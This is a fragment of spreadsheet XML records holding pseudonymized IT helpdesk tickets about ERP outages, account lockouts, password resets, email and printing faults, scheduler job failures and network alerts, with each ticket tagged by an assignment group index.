    <s v="thomklmas contacted us during the outage when a core switch in the usa nvyjtmca xjhpznds went down._x000d__x000a_he was able to confirm access was restored once the switch came back up."/>
    <s v="anuxbyzg bvsqcjkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please delete calander meetings in kurtyar v1 (suzjhmfa swmiynoz) outlook"/>
    <s v="please delete calendar meetings in kurtyar v1 (suzjhmfa swmiynoz) outlook. employee has left the company and request you to kindly delete following meetings from his calendar:_x000d__x000a_aug 19, _x000d__x000a_sep 09 &amp; sep 30_x000d__x000a_oct 21, _x000d__x000a_nov 11, _x000d__x000a_dec2 &amp; dec23_x000d__x000a__x000d__x000a_ "/>
    <s v="ymapungc kzaintyu"/>
    <x v="26"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="upiyobvj lwohuizr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no access to ethics training"/>
    <s v="hello,_x000d__x000a__x000d__x000a_i can't accede to my ethics training. my user is unrecognized. could you please check it? please see the attached screen_x000d__x000a_"/>
    <s v="fywphaxc jacdqbks"/>
    <x v="23"/>
  </r>
  <r>
    <s v="outage - core swicth in usa dac went down"/>
    <s v="colin was unable to access some sql databases. advised of the outage._x000d__x000a_he was able to confirm that issue was resolved once the core switch came back up."/>
    <s v="tmjowelq ojvkxlyd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is not opening."/>
    <s v="outlook is not opening."/>
    <s v="vitpjxgm zxiqkrns"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please unlock the SID_78user at sar r/3"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cbupnjzo.daflthkw@gmail.com_x000d__x000a__x000d__x000a_please unlock the SID_78user at sar r/3_x000d__x000a__x000d__x000a_"/>
    <s v="cbupnjzo daflthkw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="new windows 7 pc lpgw8517786 cannot connect to the rfid reader via rs232 port"/>
    <s v="new windows 7 pc lpgw8517786 cannot connect to the rfid reader via rs232 port"/>
    <s v="jdlxkygf wlzqaivr"/>
    <x v="2"/>
  </r>
  <r>
    <s v="zdsxmcwu thdjzolwronization issue "/>
    <s v="zdsxmcwu thdjzolwronization issue "/>
    <s v="smhepfdn aypgzieh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="pvlxjizg xzvlwqjc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte precimat nr.2468 freischalten"/>
    <s v="bitte die maschine precimat 1 nr.2468 wieder freischalten._x000d__x000a_ja ,unter azm"/>
    <s v="bejvhsfx dmvsclhp"/>
    <x v="25"/>
  </r>
  <r>
    <s v="password reset to login to erp hcm to be able to use or apply jobs in company"/>
    <s v="password reset to login to erp hcm to be able to use or apply jobs in company"/>
    <s v="ewlmcqsh usdlfbkh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp is not working. error : log on balancing error."/>
    <s v="inc1542327 : cert opened. _x000d__x000a_work around "/>
    <s v="wczrtsja crwioekx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp is not working. error : log on balancing error."/>
    <s v="inc1542327 : cert opened. _x000d__x000a_work around "/>
    <s v="btuqmzvs wscahikd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp is not working. error : log on balancing error."/>
    <s v="inc1542327 : cert opened. _x000d__x000a_work around "/>
    <s v="jcdewsuv mdipqhzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_32arc2"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_32arc2 at 08/17/16 06:25:30"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp SID_34 log out "/>
    <s v="india cec are having issues with erp SID_34 production, system is logging out automatically and happened more than 5 times as of now."/>
    <s v="hpmwliog kqtnfvrl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1142"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1142 at 08/17/16 06:12:30"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="reset the password for  on erp / production / erp"/>
    <s v="please reset password for SID_78user, old erp 4,6, is locked now,_x000d__x000a_"/>
    <s v="qnstifeb hybrjfex"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erp logon does not open"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qjtbrvfy.avwqmhsp@gmail.com_x000d__x000a__x000d__x000a_hello helpline,_x000d__x000a__x000d__x000a_i need erp very urgent today, but cannot connect from my computerâ€¦_x000d__x000a_[cid:image001.png@01d1f87e.5996d540]_x000d__x000a__x000d__x000a_[cid:image002.png@01d1f87e.5996d540]_x000d__x000a__x000d__x000a_the user itself is not blocked, i tried it from a colleagues pc._x000d__x000a__x000d__x000a_please advice._x000d__x000a__x000d__x000a_"/>
    <s v="qjtbrvfy avwqmhsp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp down , internet down in usa pa location "/>
    <s v="erp down , internet down in usa pa location ._x000a_contact # : "/>
    <s v="mknoeicg aziptqvu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="server down"/>
    <s v="e00462 - error reading object details: the process has been canceled: error at execute transaction /dscsag/obj_get_multidetail2: connect to message server host failed_x000a_connection paramdntyeters: type=b dest=nogui mshost=SID_34-db r3name=SID_34 group=erp production pcs=1_x000a__x000a__x000a_phone : "/>
    <s v="jdmwugop dklawfoy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_3049"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_3049 at 08/17/16 05:48:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="server probleme"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jxlekivs.fwakmztv@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_die server verbindung in lic ist gestÃ¶rt, es kann nicht in erp gebucht werden. kÃ¶nnen sie sich des problems annehmen, danke._x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="jxlekivs fwakmztv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 - system doesn't work - no production orders can be entered"/>
    <s v="contact: +49-230877"/>
    <s v="slbfmqpa qdroplyz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp is not working "/>
    <s v="erp is not working "/>
    <s v="vaqsmniw dtgnkzvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no connection to the erp system"/>
    <s v="hello,_x000d__x000a__x000d__x000a_we have no connection to the erp system._x000d__x000a__x000d__x000a_no connection to the message server (rc = 9 )_x000d__x000a__x000d__x000a_"/>
    <s v="qyndvmlw imcvznow"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connecting with erp not possible"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yfmaqovp.wdonhbez@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_we need your  help a.s.a.p._x000d__x000a_connecting with erp is not possible._x000d__x000a_we receive this error message._x000d__x000a__x000d__x000a_[cid:image001.png@01d1f87c.10671411]_x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="yfmaqovp wdonhbez"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: pp_EU_tool_netch_keheu1"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: pp_EU_tool_netch_keheu1 at 08/17/16 05:38:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp not working : erp outage."/>
    <s v="erp not working : erp outage._x000a__x000a_aeophctw nvjyhizu : united kingdom : "/>
    <s v="aeophctw nvjyhizu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp is broken down"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cbupnjzo.daflthkw@gmail.com_x000d__x000a__x000d__x000a_please see error message from erp._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1f87b.b6974d90]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen, best "/>
    <s v="cbupnjzo daflthkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: mm_zscr0099_dly_uschow1"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: mm_zscr0099_dly_uschow1 at 08/17/16 05:34:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="29"/>
  </r>
  <r>
    <s v="erp not working "/>
    <s v="erp not connecting _x000a_"/>
    <s v="nritedlm ihaufdol"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 is not working"/>
    <s v="plant germany can not log in.+"/>
    <s v="mvwiygou rpkscnlv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp logon not possible after the error , multiple users affected "/>
    <s v="please see the error message attached "/>
    <s v="mcytlpva jutxbdor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit scanner und drucker \zslugaxq dtwlrofu"/>
    <s v="_x000d__x000a_bei frau gÃ¶dde ist der drucker nicht i.o.._x000d__x000a__x000d__x000a_1. wenn sie etwas scannt, ist der scan grÃ¼n_x000d__x000a_2. sie kann nichts ausdrucken. der drucker springt zwar an aber es kommt nichts raus._x000d__x000a_"/>
    <s v="zslugaxq dtwlrofu"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit office365  \ girnda"/>
    <s v="probleme mit office365  \ girnda"/>
    <s v="wnyeczkb eqpjcukv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \gonzales"/>
    <s v="setup new ws \gonzales"/>
    <s v="usalikfj lfmpxbcn"/>
    <x v="24"/>
  </r>
  <r>
    <s v="hp alm triggered not  shown up in inbox"/>
    <s v=":_x000a_summary:actually the emails from hp alm triggered not _x000a_ shown up in inbox"/>
    <s v="nftpwqsl hgmkrtqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot print out erp documents on zz_mails functions since today around noon. please help."/>
    <s v="i want to print out erp documents as pdf file from zz_mails function. i tried to do it since today's noon for sales document, delivery document, and billing document but nothing comes until now."/>
    <s v="srpkmdcg skdubtnr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="alte it equipment abholen \wxstfouy isjzcotm"/>
    <s v="alte it equipment abholen \wxstfouy isjzcotm"/>
    <s v="wxstfouy isjzcotm"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit anmelden.  \wxstfouy isjzcotm"/>
    <s v="leider kann ich mich nicht an meinem rechner anmelden. _x000d__x000a__x000d__x000a_fehlermeldung: â€ž die verstrauensstellung zwischen dieser arbeitsstation und der primÃ¤ren domÃ¤ne konnte nicht hergestellt werden&quot;_x000d__x000a_"/>
    <s v="wxstfouy isjzcotm"/>
    <x v="24"/>
  </r>
  <r>
    <s v="network outage at usa pa. location : plant"/>
    <s v="network outage at usa pa._x000a_intranet and internet both are affected (erp + outlook ...)_x000a_contact : "/>
    <s v="svuxizgr mkynswqd"/>
    <x v="3"/>
  </r>
  <r>
    <s v="internet not working in usa location."/>
    <s v="phone lines were down too but now  its working fine._x000a_outlook says : connecting to server._x000a__x000a_contact # :"/>
    <s v="mfixrouy dyifhcjt"/>
    <x v="3"/>
  </r>
  <r>
    <s v="engineering_drawing_tool rahmen kann nicht geladen werden"/>
    <s v="engineering_drawing_tool lÃ¤dt keine zeichnungsrahmen, es kommt die meldung aus dem anhang"/>
    <s v="dknzygjt bscvykei"/>
    <x v="45"/>
  </r>
  <r>
    <s v="laptop not switching on"/>
    <s v="laptop not starting"/>
    <s v="bcefayom lzhwcgvb"/>
    <x v="18"/>
  </r>
  <r>
    <s v="getting warning messages in outloo while sending out emails via macro function - how can i disable the warning messages?"/>
    <s v="getting warning messages in outloo while sending out emails via macro function - how can i disable the warning messages?"/>
    <s v="jkshpurg isjgbdch"/>
    <x v="28"/>
  </r>
  <r>
    <s v="dn#80579343999-sales org. 1322(plant_69)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jvxmzteb.vsdcnfyr@gmail.com_x000d__x000a__x000d__x000a_hellp it help_x000d__x000a_please refer to the below delivery note number_x000d__x000a_we are not able to return pgi, please help on this._x000d__x000a_[cid:image001.png@01d1f8aa.ee338e60]_x000d__x000a__x000d__x000a_"/>
    <s v="jvxmzteb vsdcnfyr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="erp hana studio ( sidecar )  software is not working"/>
    <s v="erp hana studio ( sidecar )  software is not working"/>
    <s v="cubdsrml znewqgop"/>
    <x v="18"/>
  </r>
  <r>
    <s v="reset the password for szcbhvwe edpouqjl on erp / production / erp"/>
    <s v="dear it team, _x000d__x000a__x000d__x000a_can you please be so kind and reset franhtyuÂ´s password to daypay3?_x000d__x000a_"/>
    <s v="szcbhvwe edpouqjl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zz_mails : unable to send quotations to customer /sales"/>
    <s v="_x000d__x000a__x000d__x000a_received from: afwzehqs.jfbxegac@gmail.com_x000d__x000a__x000d__x000a_hello team_x000d__x000a__x000d__x000a_we are unable to send any quotations to customer or sales through zz_mails._x000d__x000a__x000d__x000a_please check and resolve immediately._x000d__x000a__x000d__x000a_example: 3116105044 was sent to afwzehqs.jfbxegac@gmail.com&lt;mailto:afwzehqs.jfbxegac@gmail.com&gt; but not received._x000d__x000a__x000d__x000a_warm "/>
    <s v="afwzehqs jfbxegac"/>
    <x v="12"/>
  </r>
  <r>
    <s v=" meeting inivation no skype åŠ è½½é¡¹"/>
    <s v=" meeting inivation no skype åŠ è½½é¡¹ ã€‚"/>
    <s v="ynmcplev qpgctajz"/>
    <x v="31"/>
  </r>
  <r>
    <s v="erp logon SID_34 &amp; SID_37"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kbclinop.vsczklfp@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_i have been trying but couldn't set my erp logon to same window login password.  please help to reset my erp login, and configure to the same as per my window login pw._x000d__x000a__x000d__x000a_"/>
    <s v="kbclinop vsczklfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" windows disk space utilization alert  :: HostName_19 "/>
    <s v=" windows disk space utilization alert  :: HostName_19 "/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="11"/>
  </r>
  <r>
    <s v="password not working for user : frgtyetij"/>
    <s v="_x000a_from: qwvpgayb amniujsh _x000a_sent: wednesday, august 17, 2016 12:18 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: gaiopkun bvcdpxrt; qamyesuv npmzxbek_x000a_subject: fw: sab : gaiopkun bvcdpxrt password issue_x000a_importance: high_x000a__x000a_hi team,_x000a_rubiargty changed the password a few times already but the issue remains the same : julgttie cannot log in._x000a_can you please investigate aerp because our new sales engineer needs to work on customers immediately ?_x000a_"/>
    <s v="gaiopkun bvcdpxrt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: pp_EU_tool_netch_ap1"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: pp_EU_tool_netch_ap1 at 08/17/16 03:41:32"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="windows disk space utilization alert ::: lhbsm005 "/>
    <s v="windows disk space utilization alert ::: lhbsm005 "/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="11"/>
  </r>
  <r>
    <s v="firewall company-internal-pix.company.com at ltrobe is down since 1:43am et on 08/17."/>
    <s v="firewall company-internal-pix.company.com (10.32.100.18) at ltrobe is down since 1:43am et on 08/17."/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="windows disk space utilization alert for  :: HostName_106 "/>
    <s v="windows disk space utilization alert for  :: HostName_106 _x000d__x000a_"/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="11"/>
  </r>
  <r>
    <s v="scanners down (especially scn to email is not working)"/>
    <s v="server ip : 10.32.1.101 ( no reply to ping) smtp server_x000a_error : communication error._x000a_contact : _x000a_server name : not known_x000a_server location : usa _x000a_"/>
    <s v="wqfzjycu omleknjd"/>
    <x v="11"/>
  </r>
  <r>
    <s v="document sent out via zz_mails can't be received in time"/>
    <s v="i made a uacyltoe hxgaycze as sent document 7611183197 to my own email address via zz_mails at 3 pm (apac time)._x000a_but 30 mins later, it still has not been received._x000a_"/>
    <s v="zupifghd vdqxepun"/>
    <x v="12"/>
  </r>
  <r>
    <s v="password reset."/>
    <s v="password reset."/>
    <s v="yxmutzwf fxoidlku"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zz_mails is not working"/>
    <s v="dear it team, _x000d__x000a_today our zz_mails is not working, can you please check what happened?_x000d__x000a_"/>
    <s v="fmqubnvs kcxpeyiv"/>
    <x v="12"/>
  </r>
  <r>
    <s v="mobile device activation."/>
    <s v="mobile device activation."/>
    <s v="uwncfovt vxjbunfi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="storage of 3d machine assembly models."/>
    <s v="_x000d__x000a__x000d__x000a_received from: cyxzfvtj.yklmvqxf@gmail.com_x000d__x000a__x000d__x000a_1.       need a common place for online  storage of 3d complete machine assembly models at one place. presently the drawings are in individual designer's pcs and retrieval is difficult._x000d__x000a_                day by day as more &amp; more machines are designed in 3d the data handling is going out of control._x000d__x000a__x000d__x000a_2.       common place (separate drive)  under administrative control to save and view these complete machine assembly models._x000d__x000a__x000d__x000a_3.       periodic back up &amp; archiving of data stored at this place._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_with "/>
    <s v="cyxzfvtj yklmvqxf"/>
    <x v="11"/>
  </r>
  <r>
    <s v="keine azm-meldungen mÃ¶glich"/>
    <s v="im EU_tool lassen sich keine azm-meldungen eintragen_x000d__x000a__x000d__x000a_in EU_tool, azm messages can not be registered."/>
    <s v="arkmtcig adpsrxjc"/>
    <x v="25"/>
  </r>
  <r>
    <s v="the interface 'gi7/3';'te6/1;gi7/11 and gi8/15 in bottom-6509-msfc720 switch at usa is down since 2:00am et on 08/17"/>
    <s v="the interface 'gi7/3';'te6/1;gi7/11 and gi8/15 in bottom-6509-msfc720 switch at usa is down since 2:00am et on 08/17"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="global it-germany-erp- &quot;send output with email&quot; does not works!!!"/>
    <s v="good day dear all,_x000d__x000a_please help me aerp, so that the erp-&quot;output sending with email&quot; will work as well as yesterday!_x000d__x000a_"/>
    <s v="jdynzuim uapkdvgr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent : ordering from purchasing catalogue not working"/>
    <s v="ordering from purchasing catalogue not working, unable to order. please see the attachments."/>
    <s v="uxpytsdk kyamilds"/>
    <x v="29"/>
  </r>
  <r>
    <s v="log on erp, password need to change"/>
    <s v="_x000a__x000a_received from: gvderpbx.udrzjxkm@gmail.com_x000a__x000a_hi, please assist_x000a__x000a_i had to change my windows password as it was about to expire._x000a_now i can't log in on erp._x000a__x000a_username bragtydlc_x000a_employee nr 700104_x000a__x000a__x000a_please assist aerp._x000a__x000a__x000a_"/>
    <s v="gvderpbx udrzjxkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues when processing t&amp;d requests - urgent"/>
    <s v="please help to look into the issues i got in attachment. "/>
    <s v="mqzirjkb umbgreyq"/>
    <x v="19"/>
  </r>
  <r>
    <s v="urgent!! erp outputs not generated"/>
    <s v="all users in poland encounter issue with erp outputs (see the error message attached) "/>
    <s v="djpwfxzt cfkwxlmq"/>
    <x v="12"/>
  </r>
  <r>
    <s v="my screen would beshryuout momentarily and return with the following &quot;display driver stopped responding and has recovered&quot;"/>
    <s v="i have just changed my laptop recently and after the change, every time i used microsoft excel dealing with huge information, my screen would beshryu out momentarily with the following message &quot;display driver stopped responding and has recovered.&quot;  this beshryu out could happen as often as every 5-10 minutes when i am using excel. _x000d__x000a__x000d__x000a_twice it was so bad that the screen turn blue with some information on crash dump and i have to force re-start my laptop. "/>
    <s v="qulnmvxa gznxlcts"/>
    <x v="18"/>
  </r>
  <r>
    <s v="robot lhqw8325925sf at usa is inactive since 1:54am et on 08/17."/>
    <s v="robot lhqw8325925sf at usa is inactive since 1:54am et on 08/17."/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="20160816 plant_308 label error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bjrtfeyi.fuqapwtv@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_when the operator print plant_308 label, he click &quot;made in plant_308&quot; there is no information as below correct screenshot._x000d__x000a_could you help to solve the error, please? "/>
    <s v="bjrtfeyi fuqapwtv"/>
    <x v="44"/>
  </r>
  <r>
    <s v="HostName_755 EU_tool server restart required"/>
    <s v="please restart the server aerp and check if it works again. EU_tool is not working for germany plant. our it-partner is on vacation."/>
    <s v="qmhikdzl zatcorjd"/>
    <x v="11"/>
  </r>
  <r>
    <s v="connection to 'admin2-datacenter-switch04' ;switch05 &amp; admin2-datacenter-switch06 is down at latrosince 1:40am et 08/17."/>
    <s v="connection to 'admin2-datacenter-switch04' (ping) failed  (ip: 71.62.89.948 , profile: admin2-datacenter-switch04)_x000d__x000a_connection to 'admin2-datacenter-switch05' (ping) failed  (ip: 75.16.41.846 , profile: admin2-datacenter-switch05)_x000d__x000a_connection to 'admin2-datacenter-switch06' (ping) failed  (ip: 28.12.01.025 , profile: admin2-datacenter-switch06)"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="52"/>
  </r>
  <r>
    <s v="pls help to change the internal order number 717625 from cost center cnn010 to  cplant_2412."/>
    <s v="we jsut had a new company marocm apac cost cneter cplant_2412. pls help to change the internal order number 717625 from cost center cnn010 to  cplant_2412.  "/>
    <s v="ckitashy dnqojbwi"/>
    <x v="9"/>
  </r>
  <r>
    <s v="not able to find a folder in outlook "/>
    <s v="not able to find a folder in outlook "/>
    <s v="xckbimhl ymejrugf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to send mail with forward restriction"/>
    <s v="unable to send mail with forward restriction"/>
    <s v="xjzcbgnp vfkwscao"/>
    <x v="18"/>
  </r>
  <r>
    <s v="re: deployment notification | telephony_software 2016"/>
    <s v="_x000a__x000a_received from: wqfzjycu.omleknjd@gmail.com_x000a__x000a_hi deeghyupak,_x000a__x000a_i was on vacation when your e-mail was sent last week and only managed to see it on my return minutes before the automatically deployment._x000a__x000a_on a general note unless there is a critical security risk deployment these updates should be limited to once a month, so far this month this is the third deployment. you may not realize the impact this has on our users especially the unannounced updates. in addition with users similarly to csr who are working directly with our customers, i do not think it is the best practice to deploy automatically updates especially to all users all at the same time._x000a__x000a_the impact of yesterday's deployment was that our csr phones were not operating for over 2 hours during the morning._x000a__x000a__x000a__x000a_"/>
    <s v="wqfzjycu omleknjd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem mit festnetztelefon"/>
    <s v="_x000a__x000a_received from: jctnelqs.lansuiwe@gmail.com_x000a__x000a_verehrte damen und herren,_x000a__x000a_an meinem festnetztelefon ist seit geraumer zeit die anzeige im display nur noch unvollstÃ¤ndig erkennbar._x000a_mehrere waagerechte linien machen die anzeige unlesbar._x000a__x000a_meine telefonnummer lautet 09279/80-155._x000a__x000a_bitte um abhilfe._x000a__x000a_mit freundlichem gruÃŸ_x000a__x000a_jctnelqs lansuiwe_x000a_quality assurance_x000a_jctnelqs.lansuiwe@gmail.com&lt;mailto:jctnelqs.lansuiwe@gmail.com&gt;_x000a_"/>
    <s v="jctnelqs lansuiwe"/>
    <x v="32"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1148"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1148 at 08/17/16 01:15:32"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="please advise damage dell laptop lit only 1 minute "/>
    <s v="_x000a__x000a_received from: bmhxwvys.tdmgolwn@gmail.com_x000a__x000a_dear sir_x000a__x000a_please advise damage dell laptop lit only 1 minute in, see attachment_x000a_thank for the response and cooperation._x000a__x000a_best "/>
    <s v="bmhxwvys tdmgolwn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="demage laptop"/>
    <s v="_x000a__x000a_received from: bmhxwvys.tdmgolwn@gmail.com_x000a__x000a_dear sir_x000a__x000a_i apologize_x000a_i do not know a lot about the mechanics lap top, the power button surely die._x000a_sorry i just users, in indonesia, my time is very limited for customer visits and evaluation of the data and provide engineering solutions._x000a_so if possible  i ask laptop in exchange, please help if you can bring to mr. abhay,_x000a_mr. abhay have a plan date august 22, 2016 will come to indonesia._x000a__x000a_"/>
    <s v="bmhxwvys tdmgolwn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp SID_37 account locked "/>
    <s v="erp SID_37 account locked "/>
    <s v="wqybuifo qlwfajcb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need adobe reader to download ."/>
    <s v="need adobe reader to download ."/>
    <s v="vomtbcej lyiwqrct"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account activation"/>
    <s v="_x000a__x000a_received from: nxlzpgfr.rlqowmyt@gmail.com_x000a__x000a_good morning,_x000a__x000a_please reactivate the account of my colleague mr. xrfcjkdl dtnzgkby (vvsfgtyrinv),_x000a__x000a__x000a__x000a__x000a_best "/>
    <s v="nxlzpgfr rlqowmyt"/>
    <x v="19"/>
  </r>
  <r>
    <s v="virus has been found in my laptop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gqwdslpc.clhgpqnb@gmail.com_x000d__x000a__x000d__x000a_following virus has been found in my laptop, please rectify the same._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01d1f865.b82a99c0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="omLHxJVE PYudFZBW"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skypeä¼šè®®æ—¶ä¸åŽ»"/>
    <s v="skypeä¼šè®®ä»Žé‚®ç®±é‡Œçš„é“¾æŽ¥è¿›ä¸åŽ»ã€‚"/>
    <s v="rekpvblc ufysatml"/>
    <x v="30"/>
  </r>
  <r>
    <s v="attendance_tool password "/>
    <s v="_x000d__x000a__x000d__x000a_received from: xwertljy.zrmlhkyq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_attendance_tool password forgot please reset._x000d__x000a__x000d__x000a_"/>
    <s v="xwertljy zrmlhkyq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reboot of lhqsm435, HostName_951, HostName_952, lhqsm489 &amp; HostName_997 (sql uacyltoe hxgaycze). "/>
    <s v="reboot of lhqsm435, HostName_951, HostName_952, lhqsm489 &amp; HostName_997 (sql uacyltoe hxgaycze). "/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="po issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jrdafplx.fcnjmvts@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_for the multiple cost center , why the gr amount is 0?_x000d__x000a__x000d__x000a_[cid:image005.png@01d1f873.8d4d35b0]_x000d__x000a__x000d__x000a_[cid:image006.png@01d1f873.8d4d35b0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_with best "/>
    <s v="jrdafplx fcnjmvts"/>
    <x v="29"/>
  </r>
  <r>
    <s v="i can not connect to vpn."/>
    <s v="name:pfzxecbo ptygkvzl_x000d__x000a_language:_x000d__x000a_browser:microsoft internet explorer_x000d__x000a_email:pfzxecbo.ptygkvzl@gmail.com_x000d__x000a_customer number:_x000d__x000a_telephone:_x000d__x000a_summary:i can not connect to vpn."/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="å®žä¹ ç”Ÿç™»å½•office365ä¸‹è½½é‚®ä»¶é™„ä»¶æ—¶æŠ¥é”™ï¼ˆè½¬ç»™è´ºæ­£å¹³ï¼‰"/>
    <s v="å®žä¹ ç”Ÿç™»å½•office365ä¸‹è½½é‚®ä»¶é™„ä»¶æ—¶æŠ¥é”™"/>
    <s v="kyagjxdh dmtjpbnz"/>
    <x v="30"/>
  </r>
  <r>
    <s v="lcow8327368 shows down since 8/16/2016 3:48 pm  est"/>
    <s v="lcow8327368 shows down since 8/16/2016 3:48 pm  est_x000d__x000a_location : new albaney._x000d__x000a_engineering_tool aggergrythator production server."/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="7"/>
  </r>
  <r>
    <s v="é¤åŽ…ç”µè§†æ— æ³•æ’­æ”¾è§†é¢‘æ–‡ä»¶"/>
    <s v="é¤åŽ…ç”µè§†æœºæ— æ³•æ’­æ”¾è§†é¢‘æ–‡ä»¶ï¼Œè¯·å°è´ºååŠ©å®Œæˆã€‚è°¢è°¢ï¼"/>
    <s v="aeozwlch lkiocfbn"/>
    <x v="30"/>
  </r>
  <r>
    <s v="please help add e-mail box to my outlook"/>
    <s v="_x000a__x000a_received from: pkdavqwt.tafrmxsh@gmail.com_x000a__x000a_hello it team,_x000a_could you please add e-mail box -kds.plant_283-services@company.com&lt;mailto:-kds.plant_283-services@company.com&gt; to my outlook? my id is jilgtyq, "/>
    <s v="pkdavqwt tafrmxsh"/>
    <x v="0"/>
  </r>
